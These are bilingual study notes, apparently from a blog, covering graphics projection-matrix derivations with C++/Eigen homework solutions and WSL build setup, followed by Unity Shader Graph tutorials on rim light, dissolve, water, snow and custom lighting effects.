    • A simple way of understanding 简单的理解方法

      • Camera located at origin, looking at $-Z$, up at $Y$ (looks familiar?) 相机移动到原点,以 $Y$ 轴为上方,视点在 $-Z$ 轴方向
      • Drop $Z$ coordinate 删除 $Z$ 坐标
      • Translate and scale the resulting rectangle to $[-1, 1]^2$ 将生成的矩形平移并缩放到 $[-1,1]^2$
    • In General

      • We want to map a cuboid $[l, r]\times [b, t]\times [f, n]$ to the “canonical” cube $[-1, 1]^3$

我们想把长方体 $[l,r]\times[b,t]\times[f,n]$ 映射到“规范(canonical,也译作正则、标准)”的立方体 $[-1,1]^3$

    • Slightly different orders (to the “simple way”)

      • Center cuboid by translating 通过平移使长方体居中
• Scale into “canonical” cube 缩放成“规范”立方体

    $r,l,t,b,n,f$ 的定义如下所示:

    $x$ 轴坐标范围:$[l,r]$

    $y$ 轴坐标范围:$[b,t]$

    $z$ 轴坐标范围:$[f,n]$

    png

    • Transformation matrix?

      • Translate (center to origin) first, then scale (length/width/height to 2) 首先平移(中心到原点)然后缩放(长度/宽度/高度到 2)

        $M_{ortho}=\begin{bmatrix}\frac2{r-l}&0&0&0\\0&\frac2{t-b}&0&0\\0&0&\frac2{n-f}&0\\0&0&0&1\end{bmatrix}\begin{bmatrix}1&0&0&-\frac{r+l}2\\0&1&0&-\frac{t+b}2\\0&0&1&-\frac{n+f}2\\0&0&0&1\end{bmatrix}$

    • Caveat 警告

      • Looking at / along $-Z$ is making near and far not intuitive ($n > f$) 观察/沿着 $-Z$ 轴使远近不直观($n>f$)
• $n$ 和 $f$ 是负的,$|f|>|n|$。
      • FYI: that’s why OpenGL (a Graphics API) uses left hand coords. 仅供参考:这就是 OpenGL(图形 API)使用左手坐标的原因。
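A minimal Eigen sketch of $M_{ortho}$ exactly as derived above, translate first and then scale (get_ortho is my own helper name, and the bounds in main are demo values with $n,f<0$):

#include <eigen3/Eigen/Dense>
#include <iostream>

// M_ortho = scale * translate, mapping [l,r] x [b,t] x [f,n] to [-1,1]^3
Eigen::Matrix4f get_ortho(float l, float r, float b, float t, float f, float n)
{
    Eigen::Matrix4f S = Eigen::Matrix4f::Identity();
    S(0, 0) = 2.0f / (r - l);
    S(1, 1) = 2.0f / (t - b);
    S(2, 2) = 2.0f / (n - f);
    Eigen::Matrix4f T = Eigen::Matrix4f::Identity();
    T(0, 3) = -(r + l) / 2.0f;
    T(1, 3) = -(t + b) / 2.0f;
    T(2, 3) = -(n + f) / 2.0f;
    return S * T;                                  // translate first, then scale
}

int main()
{
    // n and f are negative because the camera looks along -Z, and |f| > |n|
    Eigen::Matrix4f M = get_ortho(-2, 2, -2, 2, -50.0f, -0.1f);
    // a point on the near plane maps to z = +1 under this convention
    std::cout << M * Eigen::Vector4f(0, 0, -0.1f, 1) << std::endl;
    return 0;
}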

    Perspective Projection 透视投影

    • Most common in Computer Graphics, art, visual system 最常见于计算机图形学、艺术、视觉系统
• Farther objects are smaller 越远的物体越小
    • Parallel lines not parallel; converge to single point 平行线不平行;收敛到单点

    png

    • How to do perspective projection 如何进行透视投影

      • First “squish” the frustum into a cuboid ($n \to n$, $f \to f$) ($M_{persp\to ortho}$)

        首先将截头体“压扁”成长方体($n\to n$,$f\to f$)($M_{persp\to ortho}$)

      • Do orthographic projection ($M_{ortho}$, already known!) 做正交投影($M_{ortho}$,已经知道了!)

    png

    • In order to find a transformation 为了找到变换(推导出矩阵 $M_{persp\to ortho}$)

      • Recall the key idea: Find the relationship between transformed points $(x’, y’,z’)$ and the original points $(x, y, z)$

回想关键思想:找到变换后的点 $(x', y', z')$ 与原始点 $(x, y, z)$ 之间的关系

        $y^{\prime}=\frac nzy$

        $x^{\prime}=\frac nzx$

    png

    • In homogeneous coordinates, 齐次坐标下,

      $\begin{pmatrix}x\\y\\z\\1\end{pmatrix}\Rightarrow\begin{pmatrix}nx/z\\ny/z\\\text{unknown}\\1\end{pmatrix}==\begin{pmatrix}nx\\ny\\\text{still unknown}\\z\end{pmatrix}$

    • So the “squish” (persp to ortho) projection does this 所以“挤压”(透视到正交)投影可以做到这一点

      $M_{persp\to ortho}^{(4\times4)}\begin{pmatrix}x\\y\\z\\1\end{pmatrix}=\begin{pmatrix}nx\\ny\\\text{unknown}\\z\end{pmatrix}$

    • Already good enough to figure out part of $M_{persp\to ortho}$ 可以求得 $M_{persp\to ortho}$ 的一部分:

      $M_{persp\to ortho}=\begin{pmatrix}n&0&0&0\\0&n&0&0\\?&?&?&?\\0&0&1&0\end{pmatrix}$

• Observation: the third row is responsible for $z’$ 观察:第三行决定 $z’$

      • Any point on the near plane will not change 近平面上的任何点都不会改变

      • Any point’s z on the far plane will not change 远平面上的任何点的 $z$ 都不会改变

    • Any point on the near plane will not change 近平面上的任何点都不会改变

      $M_{persp\to ortho}^{(4\times4)}\begin{pmatrix}x\\y\\z\\1\end{pmatrix}=\begin{pmatrix}nx\\ny\\\text{unknown}\\z\end{pmatrix}\overset{\text{replace }z\text{ with }n}{\longrightarrow}\begin{pmatrix}x\\y\\n\\1\end{pmatrix}\Rightarrow\begin{pmatrix}x\\y\\n\\1\end{pmatrix}==\begin{pmatrix}nx\\ny\\n^2\\n\end{pmatrix}$

    • So the third row must be of the form $(0\ 0\ A\ B)$ 所以第三行的形式必须是$(0\ 0\ A\ B)$

      $\begin{pmatrix}0&0&A&B\end{pmatrix}\begin{pmatrix}x\\y\\n\\1\end{pmatrix}=n^2$

    • What do we have now?

      $\begin{pmatrix}0&0&A&B\end{pmatrix}\begin{pmatrix}x\\y\\n\\1\end{pmatrix}=n^2\to An+B=n^2$

• Any point’s z on the far plane will not change 远平面上的任何点的 $z$ 都不会改变

      $\begin{pmatrix}0\\0\\f\\1\end{pmatrix}\Rightarrow\begin{pmatrix}0\\0\\f\\1\end{pmatrix}==\begin{pmatrix}0\\0\\f^2\\f\end{pmatrix}\quad\to\quad Af+B=f^2$

    • Solve for $A$ and $B$

      $\begin{aligned}An+B&=n^2\\Af+B&=f^2\end{aligned}\quad\to\quad\begin{aligned}A&=n+f\\B&=-nf\end{aligned}$

    • Finally, every entry in $M_{persp\to ortho}$ is known!

    • What’s next?

      • 完成正交投影($M_{ortho}$)
      • $\begin{aligned}M_{persp}=M_{ortho}M_{persp\to ortho}\end{aligned}$
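Before moving on, a small numeric sanity check of $M_{persp\to ortho}$ (the near/far values are demo assumptions): after the homogeneous divide, a near-plane point maps to itself and a far-plane point keeps $z=f$:

#include <eigen3/Eigen/Dense>
#include <iostream>

int main()
{
    float n = -0.1f, f = -50.0f;                   // signed near/far, looking along -Z
    Eigen::Matrix4f M;                             // M_persp->ortho with A = n + f, B = -nf
    M << n, 0, 0, 0,
         0, n, 0, 0,
         0, 0, n + f, -n * f,
         0, 0, 1, 0;
    // a near-plane point maps to itself after the homogeneous divide
    Eigen::Vector4f p = M * Eigen::Vector4f(1, 2, n, 1);
    std::cout << (p / p.w()).transpose() << std::endl;   // -> (1, 2, n, 1)
    // a far-plane point keeps z = f (x and y are squished toward the axis)
    Eigen::Vector4f q = M * Eigen::Vector4f(3, 4, f, 1);
    std::cout << (q / q.w()).transpose() << std::endl;   // -> (3n/f, 4n/f, f, 1)
    return 0;
}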

    HW0

    环境配置

    WSL2 下:

    sudo apt-get install xfce4-terminal
    sudo apt-get install xfce4

    配置环境变量:

    echo "export DISPLAY=localhost:0">> ~/.bashrc

    MobaXterm 下配置 wsl2:

    png

    开跑!

    png

    安装库:

    sudo apt update
    sudo apt install g++ gdb cmake
    sudo apt install libopencv-dev libeigen3-dev
    sudo apt install libglu1-mesa-dev freeglut3-dev mesa-common-dev xorg-dev

    Windows 下的 VSCode,安装 wsl 插件,点击左下角,连接 wsl。

    png

    打开作业模板,有如下命令:

    • mkdir build: 创建名为 build 的文件夹。
    • cd build: 移动到 build 文件夹下。
• cmake ..: 注意其中 '..' 表示上一级目录,若为 '.' 则表示当前目录。
    • make: 编译程序,错误提示会显示在终端中。
    • ./Transformation:若上一步无错误,则可运行程序(这里 Transformation 为可执行文件名,可参照 CMakeLists.txt 中修改)。

    写一个 compile.sh 便于编译:

    rm -rf build
    mkdir build
    cd build
    cmake ..
    make
    ./Transformation
    cd ../

    修改权限:

    chmod a+x compile.sh

    开跑!

    sh compile.sh

    作业

写一个用于编译的 sh:

    rm -rf build
    mkdir build
    cd build
    cmake ..
    make -j4
    cd ../

    示例代码

#include<cmath>
#include<eigen3/Eigen/Core>
#include<eigen3/Eigen/Dense>
#include<iostream>

int main(){

    // Basic Example of cpp
    std::cout << "Example of cpp \n";
    float a = 1.0, b = 2.0;
    std::cout << a << std::endl;
    std::cout << a/b << std::endl;
    std::cout << std::sqrt(b) << std::endl;
    std::cout << std::acos(-1) << std::endl;
    std::cout << std::sin(30.0/180.0*std::acos(-1)) << std::endl;

    // Example of vector
    std::cout << "Example of vector \n";
    // vector definition
    Eigen::Vector3f v(1.0f,2.0f,3.0f);
    Eigen::Vector3f w(1.0f,0.0f,0.0f);
    // vector output
    std::cout << "Example of output \n";
    std::cout << v << std::endl;
    // vector add
    std::cout << "Example of add \n";
    std::cout << v + w << std::endl;
    // vector scalar multiply
    std::cout << "Example of scalar multiply \n";
    std::cout << v * 3.0f << std::endl;
    std::cout << 2.0f * v << std::endl;

    // Example of matrix
    std::cout << "Example of matrix \n";
    // matrix definition
    Eigen::Matrix3f i,j;
    i << 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0;
    j << 2.0, 3.0, 1.0, 4.0, 6.0, 5.0, 9.0, 7.0, 8.0;
    // matrix output
    std::cout << "Example of output \n";
    std::cout << i << std::endl;
    // matrix add i + j
    // matrix scalar multiply i * 2.0
    // matrix multiply i * j
    // matrix multiply vector i * v

    return 0;
}

    题目

    给定一个点 $P=(2,1)$, 将该点绕原点先逆时针旋转 $45^\circ$,再平移
    $(1,2)$,计算出变换后点的坐标(要求用齐次坐标进行计算)。


    $P$ 以齐次坐标的表示形式为 $(2, 1, 1)^T$

旋转矩阵为 $R(\pi/4)=\begin{bmatrix}\cos \pi/4 & -\sin \pi/4 & 0 \\ \sin \pi/4 & \cos \pi/4 & 0 \\ 0 & 0 & 1 \end{bmatrix}$

平移矩阵 $T(1, 2)=\begin{bmatrix}1 & 0 & 1 \\ 0 & 1 & 2 \\ 0 & 0 & 1\end{bmatrix}$

    最终坐标为 $TRP$。

#include<cmath>
#include<eigen3/Eigen/Core>
#include<eigen3/Eigen/Dense>
#include<iostream>
#define PI 3.1415926535
using namespace std;
using namespace Eigen;

int main()
{
    float theta = PI / 4.0f;
    Vector3f P(2.0f, 1.0f, 1.0f);
    Matrix3f R, T;
    R <<
        cos(theta), -sin(theta), 0,
        sin(theta), cos(theta), 0,
        0, 0, 1;
    T <<
        1, 0, 1,
        0, 1, 2,
        0, 0, 1;
    cout << T * R * P << endl;
    return 0;
}
    1.70711
    4.12132
    1

    HW1

    本次作业的任务是填写一个旋转矩阵和一个透视投影矩阵。给定三维下三个点 $v_0(2.0, 0.0,−2.0)$, $v_1(0.0, 2.0,−2.0)$, $v_2(−2.0, 0.0,−2.0)$, 你需要将这三个点的坐标变换为屏幕坐标并在屏幕上绘制出对应的线框三角形(在代码框架中,我们已经提供了draw_triangle 函数,所以你只需要去构建变换矩阵即可)。

    • get_model_matrix(float rotation_angle): 逐个元素地构建模型变换矩阵并返回该矩阵。

代公式:$$\mathbf{R}_z(\alpha)=\begin{pmatrix}\cos\alpha&-\sin\alpha&0&0\\\sin\alpha&\cos\alpha&0&0\\0&0&1&0\\0&0&0&1\end{pmatrix}$$

Eigen::Matrix4f get_model_matrix(float rotation_angle)
{
    Eigen::Matrix4f model = Eigen::Matrix4f::Identity();

    // TODO: Implement this function
    // Create the model matrix for rotating the triangle around the Z axis.
    // Then return it.

    float angle = rotation_angle * MY_PI / 180.0f;

    Eigen::Matrix4f translate;
    translate << std::cos(angle), -std::sin(angle), 0, 0,
        std::sin(angle), std::cos(angle), 0, 0,
        0, 0, 1, 0,
        0, 0, 0, 1;
    model = translate * model;
    return model;
}
    • get_projection_matrix(float eye_fov, float aspect_ratio, float zNear, float zFar): 使用给定的参数逐个元素地构建透视投影矩阵并返回该矩阵。

    代公式:$\begin{aligned}M_{persp}=M_{ortho}M_{persp\to ortho}\end{aligned}$

    其中:

$M_{persp\to ortho}$ 先将透视视锥“压扁”成长方体,随后再由 $M_{ortho}$ 映射到“规范(正则、标准)”的立方体 $[-1,1]^3$,因此:

$M_{persp\to ortho}=\begin{bmatrix}\mathrm{zNear}&0&0&0\\0&\mathrm{zNear}&0&0\\0&0&\mathrm{zNear}+\mathrm{zFar}&-\mathrm{zNear}\times\mathrm{zFar}\\0&0&1&0\end{bmatrix}$


$M_{ortho}=\begin{bmatrix}\frac2{r-l}&0&0&0\\0&\frac2{t-b}&0&0\\0&0&\frac2{n-f}&0\\0&0&0&1\end{bmatrix}\begin{bmatrix}1&0&0&-\frac{r+l}2\\0&1&0&-\frac{t+b}2\\0&0&1&-\frac{n+f}2\\0&0&0&1\end{bmatrix}$

    png

具体地,如上图,zNear 即为 $n$,zFar 即为 $f$,且 $\tan(\mathrm{eye\_fov}/2)=\frac{t}{|n|}$。

    由于右手坐标系 $n$ 和 $f$ 为负,因此:

    float angle = eye_fov * MY_PI / 180.0f;
    float n = -zNear;
    float f = -zFar;
    float t = std::tan(angle / 2) * n;
    float b = -t;
    float r = t * aspect_ratio;
    float l = -r;

    最后 $\begin{aligned}M_{persp}=M_{ortho}M_{persp\to ortho}\end{aligned}$ 即为所求。

    完整代码:

Eigen::Matrix4f get_projection_matrix(float eye_fov, float aspect_ratio,
                                      float zNear, float zFar)
{
    // Students will implement this function

    Eigen::Matrix4f projection = Eigen::Matrix4f::Identity();

    // TODO: Implement this function
    // Create the projection matrix for the given parameters.
    // Then return it.

    Eigen::Matrix4f M_P;
    M_P << zNear, 0, 0, 0,
        0, zNear, 0, 0,
        0, 0, zNear + zFar, -(zNear * zFar),
        0, 0, 1, 0;

    float angle = eye_fov * MY_PI / 180.0f;
    float n = -zNear;
    float f = -zFar;
    float t = std::tan(angle / 2) * n;
    float b = -t;
    float r = t * aspect_ratio;
    float l = -r;

    Eigen::Matrix4f M_T;
    M_T << 1, 0, 0, -(r + l) / 2,
        0, 1, 0, -(t + b) / 2,
        0, 0, 1, -(n + f) / 2,
        0, 0, 0, 1;

    Eigen::Matrix4f M_S;
    M_S << 2 / (r - l), 0, 0, 0,
        0, 2 / (t - b), 0, 0,
        0, 0, 2 / (f - n), 0,
        0, 0, 0, 1;

    // M_ortho = M_S * M_T(先平移、后缩放,与上面的公式一致)
    projection = M_S * M_T * M_P * projection;
    return projection;
}

    运行时:

    • n = -0.1
    • f = -50
    • t = -0.0414214
    • b = 0.0414214
    • r = -0.0414214
    • l = 0.0414214

    提高项:在 main.cpp 中构造一个函数,该函数的作用是得到绕任意
    过原点的轴的旋转变换矩阵。Eigen::Matrix4f get_rotation(Vector3f axis, float angle)

代公式:$$\mathbf{R}(\mathbf{n},\alpha)=\cos(\alpha)\mathbf{I}+(1-\cos(\alpha))\mathbf{n}\mathbf{n}^T+\sin(\alpha)\underbrace{\begin{pmatrix}0&-n_z&n_y\\n_z&0&-n_x\\-n_y&n_x&0\end{pmatrix}}_{\mathbf{N}}$$

Eigen::Matrix4f get_rotation(Vector3f axis, float angle)
{
    Eigen::Matrix4f model = Eigen::Matrix4f::Identity();

    float alpha = angle * MY_PI / 180.0f;
    float nx = axis[0];
    float ny = axis[1];
    float nz = axis[2];
    // N: the skew-symmetric (cross-product) matrix of the axis
    Eigen::Matrix3f M;
    M <<
        0, -nz, ny,
        nz, 0, -nx,
        -ny, nx, 0;
    // Rodrigues' formula; note the n n^T term assumes axis is already normalized
    Eigen::Matrix3f R = std::cos(alpha) * Eigen::Matrix3f::Identity() + (1 - std::cos(alpha)) * axis * axis.transpose() + std::sin(alpha) * M;
    Eigen::Matrix4f translate = Eigen::Matrix4f::Identity();
    translate.block<3, 3>(0, 0) = R;

    model = translate * model;
    return model;
}
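One way to sanity-check get_rotation (which, as noted above, assumes the axis is already normalized) is to compare its 3x3 block against Eigen's built-in axis-angle rotation; a minimal sketch with a demo axis and angle:

#include <eigen3/Eigen/Dense>
#include <iostream>

int main()
{
    // get_rotation(axis, 30.0f) should produce the same 3x3 block as this
    Eigen::Vector3f axis = Eigen::Vector3f(1, 1, 0).normalized();
    float rad = 30.0f * 3.14159265f / 180.0f;
    Eigen::Matrix3f R = Eigen::AngleAxisf(rad, axis).toRotationMatrix();
    std::cout << R << std::endl;
    return 0;
}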
    ]]>
    @@ -4312,7 +4312,7 @@ /posts/Unity-Shader%20Graph/ - 资源

    课程

    最简明的图形渲染流程解说——别被图形学吓到,入门

    图形渲染流程:

    几何阶段

    • 模型

      • 模型顶点 $XYZ$ 坐标

      • 模型矩阵 $M$

    • 世界(游戏场景)

      • 世界空间坐标
        • 模型空间到世界空间的转换过程:世界空间坐标 $= M\times$ 顶点坐标
    • 相机

      • 观察矩阵 $V$
      • 观察空间坐标
        • 世界空间到观察空间的转换过程:观察空间坐标 $= V\times M\times$ 顶点坐标
    • 投影

      • 投影矩阵 $P$
      • 投影坐标
        • 观察空间到投影的转换过程:投影坐标 $= P\times V\times M\times$ 顶点坐标

​ 由于矩阵乘法满足结合律,因此我们将引入的三个矩阵结合称为 $MVP$ 矩阵。($MVP$ 矩阵乘以坐标,就完成了坐标的完整变换,这个过程被称为几何阶段。)

    ​ 要对顶点坐标做额外的处理,称之为顶点着色器 Vertex Shader
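As a sketch of the associativity point above, the three matrices can be premultiplied once into a single MVP matrix (identity placeholders here stand in for real model/view/projection values):

#include <eigen3/Eigen/Dense>
#include <iostream>

int main()
{
    // Identity placeholders; in a real pipeline each matrix comes from the
    // model / view / projection stages described above
    Eigen::Matrix4f M = Eigen::Matrix4f::Identity();
    Eigen::Matrix4f V = Eigen::Matrix4f::Identity();
    Eigen::Matrix4f P = Eigen::Matrix4f::Identity();
    Eigen::Matrix4f MVP = P * V * M;               // premultiplied once, reused per vertex
    Eigen::Vector4f vertex(1, 2, 3, 1);            // model-space vertex, w = 1
    std::cout << MVP * vertex << std::endl;        // clip-space position
    return 0;
}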


    光栅化

    ​ 几何阶段结束后,还需要进行光栅化,才可以一个个像素点地显示。

    ​ 在光栅化阶段,计算机需要知道这些屏幕像素需要涂上什么样的颜色,是片元着色器 Fragment Shader需要完成的工作。


    通用着色器又叫顶点-片元着色器,因此两种着色器加起来才是完整的 Shader。

    01. 第一个光照 shader

    ​ URP / HDRP 支持 ShaderGraph。

    • Lit Shader Graph,光照模板,相当于以前的 PBR 节点。

    • Unlit Shader Graph,无光照模板

    png

    ​ 新建一个 Lit Shader Graph,打开之。

    png

    • 左边的面板可以控制最终显示在 Material 面板上的参数。

    • 中间的节点控制 Shader 逻辑。

    • 右边的 Graph Inspector 用于设置节点属性(Node Settings)和全局属性(Graph)。

    ​ 课程的示例 Shader Graph。

    • MainTex 是可设置的 Texture2D 类。
    • Sample Texture 2D 节点将 Texture 坐标转成 RGBA 颜色信息输出。
    • MainColor 是可设置的 Color 类。
    • Multiply 节点将两种颜色 A 和 B 相乘成一种颜色 Out 输出。
    • ColorTemp 和 ColorTint 都是可设置的 Float 数,在 Node Settings 以 Slider 形式,范围在 0 到 1 之间。
      • ColorTemp 色温越小越蓝,越大越黄。
      • ColorTint 色调越小越绿,越大越粉。
    • White Balance 节点用于白平衡处理。
    • 最后将输出的颜色应用在 Fragment 的 BaseColor 上。

    ​ 在 GameObject 上的效果:

    png

    01-1 光照补充与 SubGraph

    png

    ​ 新建一个 Shader Graph,绑定 Material,再绑定到模型上。

    jpg

    ​ 一阵操作 Shader Graph,使得 Shader Graph 可以支持:

    • MainTex 贴图
    • Normal 法线贴图
• Metallic 金属度贴图
    • Smoothness 光滑度
    • Emission 自发光贴图
    • EmissionOn 控制自发光是否打开
    • EmissionColor 自发光颜色
    • AO 环境光屏蔽贴图

​ 选中这些节点,右键 Convert To Sub Graph。

    png

    ​ 这些节点就以一个 SubGraph 的形式展示。

    02. 轮廓光/边缘光

    png

    ​ 根据原模型提供的漫反射贴图 MainTex、法线贴图 NormalTex、金属度贴图 MetalTex、自发光贴图 EmissionTex 创建 Shader Graph 节点。

    png

    ​ 创建轮廓光效果:

    • Fresnel Effect 节点,创建轮廓光
    • RimPower,Float 属性,控制轮廓光强度,值越接近 0,轮廓光越发散
    • RimColor,Color 属性,控制轮廓光颜色
    • Multiply 节点,将 Fresnel Effect 节点输出的颜色值和 RimColor 相乘,获得带颜色的轮廓光
    • Add 节点,将轮廓光与轮廓光贴图相结合
      • 为什么要用 Add 而不是 Multiply?因为轮廓光贴图几乎全黑,使用 Multiply 会导致最后输出也几乎全黑

    png

    ​ 最终效果。

    03. 溶解

    png

​ 溶解效果需要在 Graph Inspector 里打开 Alpha Clipping。

    • Simple Noise 节点控制溶解形态,连接至 Alpha。

    • Noise Scale 控制溶解图案大小。

    • ClipRate 控制 Alpha Clip Threshold,Alpha 值低于 ClipRate 的点将不会被渲染。

    png

    ​ 添加溶解自发光边缘。

    • EdgeWidth 控制边缘宽度。
• ClipRate 和 EdgeWidth 经过 Add 节点叠加,输出值和 Simple Noise 的输出作为 Step 节点的输入,得到一张二值化图。
    • 二值化图和 EdgeColor 节点作为 Multiply 节点的输入,给溶解边缘染色,最后连上 Emission。

    png

    ​ 演示效果。

    png

    ​ 如果要利用模型自带的 Emission 贴图,还要再整个 Add 节点,最后再连 Emission 节点。

    png

    ​ 可以使用代码控制 ClipRate 的值来控制消融状态。

    ​ 如果要让物体自动消融,则可以使用 Time 节点连着 Remap 替换 ClipRate 来让物体自动消融。

    04. 水面(上)

    png

    • 水面是透明的,Surface Type 设成 Transparent。

    • 水面没有阴影,关闭 Cast Shadows。

    png

    ​ 检测与岸边的相交边缘,不透明的物体与半透明的物体之间的边缘检测,需要依靠屏幕深度来完成,打开它。

    png

    场景深度节点深度(Scene Depth,Sampling 为 Eye,包含透明像素)减去屏幕空间的 $W$ 向量(Screen Position,Mode 为 Raw,不包含透明像素)就是不透明物体与半透明物体相交的边缘。

    png

    ​ 预览结果。靠近水面边缘的地方呈现黑色,表明场景深度有效。

    png

    • 增加一个 Depth,控制深浅强度。

    • Strength 连 Multiply 调整修改力度。

    png

    • Clamp 将值钳制在 0 到 1 之间。
    • ShallowColor 和 Deep Color 控制水波颜色。

    png

    ​ 浏览效果,此时水已经被染色。

    png

​ Lerp 分离出 Alpha 通道,以显示水的透明效果。

    ​ 设定好 ShallowColor 和 Deep Color 的 Alpha 值才有效。

    png

    ​ 浏览效果,此时水呈现透明色。

    png

    ​ 给水增加法线贴图。

    ​ 共有两种法线:

    • FirstNormal
    • SecondNormal

    ​ SampleTexture2D 的 Type 记得选 Normal。两个法线贴图用 Add 节点相加。

    • Tiling And Offset 控制法线贴图的缩放和平移。
    • Normal Strength 调整法线强度,最后连片元着色器的 Normal。

    png

    ​ 浏览效果。可以正确渲染法线了。

    png

    ​ 将 NormalStrength 与 边缘信息再进行 Lerp 运算,使得法线贴图考虑边缘信息。

    png

    ​ 给法线贴图的 Tiling And Offset 用 Time 控制,以达到水波流动的动态效果。

    png

    ​ 在 Scene 里打开 Always Refresh,便可浏览到水流实时流动的效果。

    png

    ​ 接下来修改顶点着色器,只需要修改模型的 Y 坐标即可。

    ​ 用 Gradient Noise 给模型的 Y 坐标做一个扰动,后面用 Time、Multiply、Tiling And Offset 控制扰动属性。

    png

    ​ 浏览效果,此时物体发生了形变。

    png

    ​ 增加 Displacement 控制扰动强度。

    png

    ​ 预览结果。通过修改 Displacement 的值以修改扰动强度。

    05. 水面(下)

    png

    ​ 为了给水面增加波光粼粼的效果,使用一个 Float 类型,范围 $[0, 1]$ 的 Smoothness 来控制片元着色器的 Smoothness。

    png

    ​ 给水面增加物体折射扭曲的效果,需要操作场景像素点的颜色 Scene Color,渲染器设置的 Opaque Texture 需要打开。

    png

    ​ 增加 Gradient Noise,Normal From Weight 将其转成法线贴图来调整 Scene Color,最后与之前渲染的颜色作一个 Lerp,输出到片元着色器的 Base Color。

    ​ RefractionStrength 可以调整折射的强度。

    png

    ​ 预览效果。

    png

    ​ 使用 Time 操作 Gradient Noise 的 Tiling And Offset 让折射效果随时间而变化。

    ​ RefractionSpeed 和 RefractionScale 分别控制折射效果的改变速度和扭曲大小。

    png

    ​ 最终 Shader Graph 如上图所示。

    06. 积雪

    png

    ​ 使用之前 pbr Sub Graph 创建一个基本的 Shader Graph 模板。

    png

    ​ 通过物体表面法线方向 Normal Vector 与世界空间的夹角来判断这个表面是否应该要有积雪。

    • SnowDirection 雪的方向,作一个 Normalize 归一化。
• Dot Product,计算物体表面法线方向和雪的方向之间的夹角。
    • Remap,将 $[-1, 1]$ 的范围映射到 $[0, 1]$。
    • SnowDepth,控制雪的深度。
• OneMinus,输出值 = 1 − 输入值,让 SnowDepth 符合值越大深度越深的效果。
    • Step,阈值处理。
    • 与之前的 Emission 做相加,最后的 Emission 即为所求。

    png

    ​ 预览效果。

    07. 自定义光照

    漫反射:

​ 兰伯特光照模型:$\mathrm{diffuse}=I\,(L\cdot N)$

    • $I$ 是光照强度。
    • $L$ 为入射光线的反向量。
    • $N$ 为当前表面的法向量方向。
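A minimal C++/Eigen sketch of the Lambert term (the vectors are demo values; the max(0, .) clamp is the usual convention so that back-facing light contributes nothing, though the formula above omits it):

#include <algorithm>
#include <eigen3/Eigen/Dense>
#include <iostream>

int main()
{
    Eigen::Vector3f I(1.0f, 1.0f, 1.0f);                         // light intensity (demo value)
    Eigen::Vector3f L = Eigen::Vector3f(1, 1, 0).normalized();   // direction toward the light
    Eigen::Vector3f N(0.0f, 1.0f, 0.0f);                         // surface normal
    // Lambert term; the clamp keeps back-facing light from subtracting
    float ndotl = std::max(0.0f, L.dot(N));
    Eigen::Vector3f diffuse = I * ndotl;
    std::cout << diffuse.transpose() << std::endl;
    return 0;
}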

    png

    ​ 这么放置节点。

    png

    ​ MainLight 是一个自定义函数类,设置好它的 Outputs:

    • Color 漫反射颜色
    • Direction 漫反射方向
    # if SHADERGRAPH_PREVIEW
    Color = 1;
    Direction = -1;
    # else
    Light light = GetMainLight();
    Color = light.color;
    Direction = light.direction;
    # endif

    png

    ​ 漫反射预览效果。

void MainLight_half(float3 WorldPos, out half3 Direction, out half3 Color, out half DistanceAtten, out half ShadowAtten)
{
#ifdef SHADERGRAPH_PREVIEW
    Direction = half3(0.5, 0.5, 0);
    Color = 1;
    DistanceAtten = 1;
    ShadowAtten = 1;
#else

#ifdef SHADOWS_SCREEN
    half4 clipPos = TransformWorldToClip(WorldPos);
    half4 shadowCoord = ComputeScreenPos(clipPos);
#else
    half4 shadowCoord = TransformWorldToShadowCoord(WorldPos);
#endif
    Light light = GetMainLight(shadowCoord);
    Direction = light.direction;
    Color = light.color;
    DistanceAtten = light.distanceAttenuation;
    ShadowAtten = light.shadowAttenuation;
#endif
}

void DirectSpecular_half(half3 Specular, half Smoothness, half3 Direction, half3 Color, half3 WorldNormal, half3 WorldView, out half3 Out)
{
#ifdef SHADERGRAPH_PREVIEW
    Out = 0;
#else
    Smoothness = exp2(10 * Smoothness + 1);
    WorldNormal = normalize(WorldNormal);
    WorldView = SafeNormalize(WorldView);
    Out = LightingSpecular(Color, Direction, WorldNormal, WorldView, half4(Specular, 0), Smoothness);
#endif
}

这个 HLSL 文件中定义了两个函数:MainLight_half 和 DirectSpecular_half,分别用于计算主光源的信息和直接镜面反射的信息。

MainLight_half 函数接收一个世界坐标位置(WorldPos)作为输入,输出主光源的方向(Direction)、颜色(Color)、距离衰减(DistanceAtten)和阴影衰减(ShadowAtten)。函数中首先判断是否在 ShaderGraph 预览模式下,如果是则直接赋值,否则根据是否使用屏幕空间阴影来计算阴影坐标(shadowCoord),然后根据阴影坐标获取主光源信息。

DirectSpecular_half 函数接收镜面反射系数(Specular)、光滑度(Smoothness)、方向(Direction)、颜色(Color)、世界法线(WorldNormal)和世界视线(WorldView)作为输入,输出镜面反射的颜色(Out)。函数中首先判断是否在 ShaderGraph 预览模式下,如果是则直接赋值,否则对输入参数进行处理(例如计算光滑度,规范化法线和视线等),然后调用 LightingSpecular 函数计算镜面反射的颜色。

    这两个函数主要用于在 Unity 的 Shader 中计算光照和反射,以实现更真实的渲染效果。

    png

    ​ 把上面这些代码放在一个 hlsl 文件中。

    png

​ MainLight_half 函数,精度为 Half,读取 Position 作为世界坐标,输出:

    • 主光源的方向 Direction
    • 颜色 Color
    • 距离衰减 DistanceAtten
    • 阴影衰减 ShadowAtten

    镜面反射:光照强度是光源向量与顶点法线的反射向量的点积。

    png

    ​ DirectSpecular_half 函数,精度为 Half。

    输入:

    • 镜面反射系数 Specular
    • 光滑度 Smoothness
    • 方向 Direction
    • 颜色 Color
    • 世界法线 WorldNormal
    • 世界视线 WorldView

    输出:

    • 镜面反射的颜色 Out

    png

    • 镜面反射系数 Specular
    • 光滑度 Smoothness
    • 方向 Direction
    • 颜色 Color

    ​ 由物体给出;

    • 世界法线 WorldNormal
    • 世界视线 WorldView

    ​ 从游戏世界中获取。

    png

    ​ emmmm 乱七八糟的节点。

    png

    ​ 最终效果。

    08. 四方线框

    png

    ​ 教程里的四方线框对模型的 UV 贴图有要求,Blender 新建一个立方体模型,做细分,添加一个 UVMaps 并重置,导出至 Unity。

    png

    ​ 使用 Alpha Clip 隐去非边框的像素来实现四方线框的效果。

    png

    ​ 预览效果。

    png

    ​ 制作 U 另一方向。

    png

    ​ 预览效果。

    png

    ​ 同理,制作 V 方向的效果。

    png

    ​ 预览效果。

    png

    ​ 增加 Emission 颜色,颜色模式设为 HDR。

    png

    ​ 预览效果。

    png

    ​ 如果需要辉光效果,在 Camera 里打开 Post Processing。

    png

